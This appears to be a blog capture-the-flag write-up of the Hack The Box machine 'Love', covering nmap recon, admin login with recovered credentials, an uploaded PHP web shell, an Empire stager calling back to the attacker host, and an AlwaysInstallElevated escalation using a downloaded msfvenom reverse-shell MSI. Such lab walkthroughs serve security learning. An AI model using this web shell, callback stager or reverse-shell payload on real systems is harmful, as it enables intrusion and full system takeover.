Love

love

Really interesting box. We understood a cuppa new things and methods there. So sit tight and read through. Enjoy!

RECON PHASE

NMAP

As usual, we enumerate our target’s services.

# nmap -sV -sC -p- love.htb -oA love                                                                                                                                                                                                     130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-05 04:35 EDT
Stats: 0:02:45 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 94.74% done; ETC: 04:37 (0:00:05 remaining)
Nmap scan report for love.htb (10.10.10.239)
Host is up (0.050s latency).
Not shown: 65516 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/ssl      Apache httpd (SSL-only mode)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after:  2024-04-10T14:39:19
|_ssl-date: 2021-08-05T09:05:25+00:00; +26m04s from scanner time.
| tls-alpn: 
|_  http/1.1
7680/tcp  open  pando-pub?
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Network Distance: 2 hops
Service Info: Hosts: LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 26m03s, deviation: 0s, median: 26m03s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-08-05T09:05:12
|_  start_date: N/A

NESSUS Scan

First, ran port scan to remove false-positives from nmap result:

Then I ran Basic Network Scan. The scan so far discovered multiple vulnerabilities which will be analysed during exploit phase.

Manual Recon of the Attack Surface

Port 80 HTTP
We have a login form on the index page of the love’s web service. I have tested the input fields for special characters and got an error that gives out some important information:

  • Server: Apache 2.4.45
  • It is of type php v7.3.27
  • It is on a Windows x64
  • OpenSSL v1.1.1j
  • Additionally, we got information about filesystem and the internal location of server.
  • PORT 5000 HTTP
    We don’t have permissions to see the website:
┌──(root💀kali)-[~]
└─# curl 10.10.10.239:5000                                                                                                                                                                                                             130 ⨯
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 10.10.10.239 Port 5000</address>
</body></html>
  • PORT 443 HTTPS

It appears that we don’t have access (forbidden) to the 443 love.htb domain however, the nmap scan reveals a subdomain called “staging” which usually means under development. Add the staging subdomain in the hosts file (/etc/hosts) in order to be able to query it.

I have poked the input in order to test for weakness in the input validation mechanism. And then it hit me that the service could probably access port 5000!

 Vote Admin Creds admin: @LoveIsInTheAir!!!! 
  • Port 445, 139 SMB
    We know from our initial scan that there is an smb service running. Let’s figure its identity.
msf6 auxiliary(scanner/smb/smb_version) > run

[*] 10.10.10.239:445      - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{781dd960-f30d-4aa0-b1c5-efbe7902f2d9}) (authentication domain:LOVE)
[+] 10.10.10.239:445      -   Host is running Windows 10 Pro (build:19042) (name:LOVE)
[*] 10.10.10.239:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
  • Dirbuster Output

Our directory enumeration revealed admin login panel.

Expoit Phase

We have credentials and an admin panel. Let’s try them:
Admin:@LoveIsInTheAir!!!!

First ,we need to create a Position in order to create a candidate. At the candidates page, we are able to upload image when creating one.

I managed to upload a nice and stable shell.
The file was taken from joswr1ght github – easy simple php webshell

The code of the file:

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
</html>

To access the shell, we visit the /images/ directory and open the file that contains this code:

Let’s create a reverse shell. First, I upload nc.exe located in /usr/share/windows/resources/nc.exe to the images directory. Next, I use the webshell to execute the nc.exe to listen on port 1234 and when connected to, will spawn cmd shell.

# nc 10.10.10.239 1234                                                                                                                                                                                                                 1 ⨯
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>

Privilege Escalation

System information

systeminfo is a command that we run to provide us with information about the system (obviously)

C:\tmp>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19042 N/A Build 19042


C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe

What users are there on the system? What permissions do I have?

C:\tmp>net users
net users

User accounts for \\LOVE

-------------------------------------------------------------------------------
admin123                 Administrator            DefaultAccount           
Guest                    Phoebe                   WDAGUtilityAccount       
The command completed successfully.

C:\tmp>net user phoebe
net user phoebe
User name                    Phoebe
Full Name                    Phoebe
Comment                      Workstation Power User
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            4/12/2021 12:54:30 PM
Password expires             Never
Password changeable          4/12/2021 12:54:30 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   8/5/2021 6:09:49 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use*Users                
Global Group memberships     *None                 
The command completed successfully.

Setup Empire

In the following lines I have done the following:

  1. I have created an http listener, renamed it as “love” and ran it.
  2. I went back a directory then I have listed the active listeners to check if it is running correctly.
  3. Created a stager for windows as a .bat file called launcher. Edited its features to make it persistent and not delete itself after reboot or insertion. Then Added the stager to the love listener we created previously. Finally, executed it which actually created the file in /tmp/ directory.
  4. Uploaded the file from the web application into the images directory and then used the already existing shell to execute the launcher.bat file.
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Name love
(Empire: listeners/http) > execute
[*] Starting listener 'love'
 * Serving Flask app "http" (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: off
[+] Listener successfully started!

(Empire: listeners/http) > back
(Empire: listeners) > list

[*] Active listeners:

  Name              Module          Host                                 Delay/Jitter   KillDate
  ----              ------          ----                                 ------------   --------
  love              http            http://10.10.14.3:80                 5/0.0                      


(Empire: listeners) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > set Delete False
(Empire: stager/windows/launcher_bat) > set Listener love
(Empire: stager/windows/launcher_bat) > execute
[*] Stager output written out to: /tmp/launcher.bat
(Empire: stager/windows/launcher_bat) > 
[*] Sending POWERSHELL stager (stage 1) to 10.10.10.239                                                                                                                                                                                      
[*] New agent TBVR8X2S checked in                                                                                                                                                                                                            
[+] Initial agent TBVR8X2S from 10.10.10.239 now active (Slack)                                                                                                                                                                              
[*] Sending agent (stage 2) to TBVR8X2S at 10.10.10.239
(Empire: stager/windows/launcher_bat) > agents

[*] Active agents:                                                                                                                                                                                                                           

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener                                                                                                      
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------                                                                                              
 TBVR8X2S ps 10.10.10.239    LOVE              LOVE\Phoebe             powershell         6192   5/0.0    2021-08-09 12:04:57  love                                                                                                          

To interact with it easily – rename it to something, then simply type “interact \”:

(Empire: stager/windows/launcher_bat) > agents

[*] Active agents:                                                                                                                                                                                                                           

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener                                                                                                      
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------                                                                                              
 TBVR8X2S ps 10.10.10.239    LOVE              LOVE\Phoebe             powershell         6192   5/0.0    2021-08-09 12:04:57  love                                                                                                          
(Empire: agents) > rename TBVR8X2S windows10
(Empire: agents) > agents

[*] Active agents:

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
 windows1 ps 10.10.10.239    LOVE              LOVE\Phoebe             powershell         6192   5/0.0    2021-08-09 12:09:25  love            

(Empire: agents) > interact windows10
(Empire: windows10) > 

Using powerUp.ps1

#FINDINGS#
(Empire: powershell/privesc/powerup/allchecks) > run
[*] Tasked TBVR8X2S to run TASK_CMD_JOB
[*] Agent TBVR8X2S tasked with task ID 4
[*] Tasked agent windows10 to run module powershell/privesc/powerup/allchecks
(Empire: powershell/privesc/powerup/allchecks) > 
Job started: 1P6W8C

[*] Running Invoke-AllChecks                                                                                                                                                                                                                

[*] Checking if user is in a local group with administrative privileges...                                                                                                                                                                  

[*] Checking for unquoted service paths...                                                                                                                                                                                                  

[*] Checking service executable and argument permissions...         

ServiceName                     : edgeupdate                                                                                                                                                                                                
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc                                                                                                                                
ModifiableFile                  : C:\                                                                                                                                                                                                       
ModifiableFilePermissions       : AppendData/AddSubdirectory                                                                                                                                                                                
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users                                                                                                                                                                          
StartName                       : LocalSystem                                                                                                                                                                                               
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdate'                                                                                                                                                                  
CanRestart                      : False                                                                                                                                                               

ServiceName                     : edgeupdate                                                                                                                                                                                                
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc                                                                                                                                
ModifiableFile                  : C:\                                                                                                                                                                                                       
ModifiableFilePermissions       : {Delete, GenericWrite, GenericExecute, GenericRead}                                                                                                                                                       
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users                                                                                                                                                                          
StartName                       : LocalSystem                                                                                                                                                                                               
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdate'                                                                                                                                                                  
CanRestart                      : False         



ServiceName                     : edgeupdatem                                                                                                                                                                                               
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc                                                                                                                             
ModifiableFile                  : C:\                                                                                                                                                                                                       
ModifiableFilePermissions       : AppendData/AddSubdirectory                                                                                                                                                                                
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users                                                                                                                                                                          
StartName                       : LocalSystem                                                                                                                                                                                               
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdatem'                                                                                                                                                                 
CanRestart                      : False       




ServiceName                     : edgeupdatem                                                                                                                                                                                               
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc                                                                                                                             
ModifiableFile                  : C:\                                                                                                                                                                                                       
ModifiableFilePermissions       : {Delete, GenericWrite, GenericExecute, GenericRead}                                                                                                                                                       
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users                                                                                                                                                                          
StartName                       : LocalSystem                                                                                                                                                                                               
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdatem'                                                                                                                                                                 
CanRestart                      : False  


[*] Checking for AlwaysInstallElevated registry key...                                                                                                                                                                                      
AbuseFunction : Write-UserAddMSI                                                                                                                                                                                                            
[*] Checking %PATH% for potentially hijackable DLL locations...                                                                                                                                                                             
ModifiablePath    : C:\Users\Phoebe\AppData\Local\Microsoft\WindowsApps                                                                                                                                                                     
IdentityReference : LOVE\Phoebe                                                                                                                                                                                                             
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}                                                                                                                                                                   
%PATH%            : C:\Users\Phoebe\AppData\Local\Microsoft\WindowsApps                                                                                                                                                                     
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\Phoebe\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'                                       

After trying a couple of times to hijack DLL, I was unsuccessful – even though I did it correctly. Perhaps the reason is because it needs some type of user interaction or requirements that are unmet. And proceeded to further enumerate the system with winPEAS:

A quick google search shows us how to exploit this:
First, setup a listener to catch the connection. Then follow the steps from the provided link to create a reverse shell with msfvenom, move the file onto the victim machine and then run msiexec as follows:

C:\Users\Phoebe\Desktop>curl http://10.10.14.3:8888/frustrated.msi -o alwaysinstallelevated.msi
curl http://10.10.14.3:8888/reverse.msi -o alwaysinstallelevated.msi
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  156k  100  156k    0     0   156k      0  0:00:01 --:--:--  0:00:01  500k

C:\Users\Phoebe\Desktop>msiexec /quiet /qn /i alwaysinstallelevated.msi

msiexec /quiet /qn /i alwaysinstallelevated.msi
# nc -nlvp 4321                                                                                                                                                                                                                        1 ⨯
listening on [any] 4321 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.239] 58312
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>

We did it bois.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: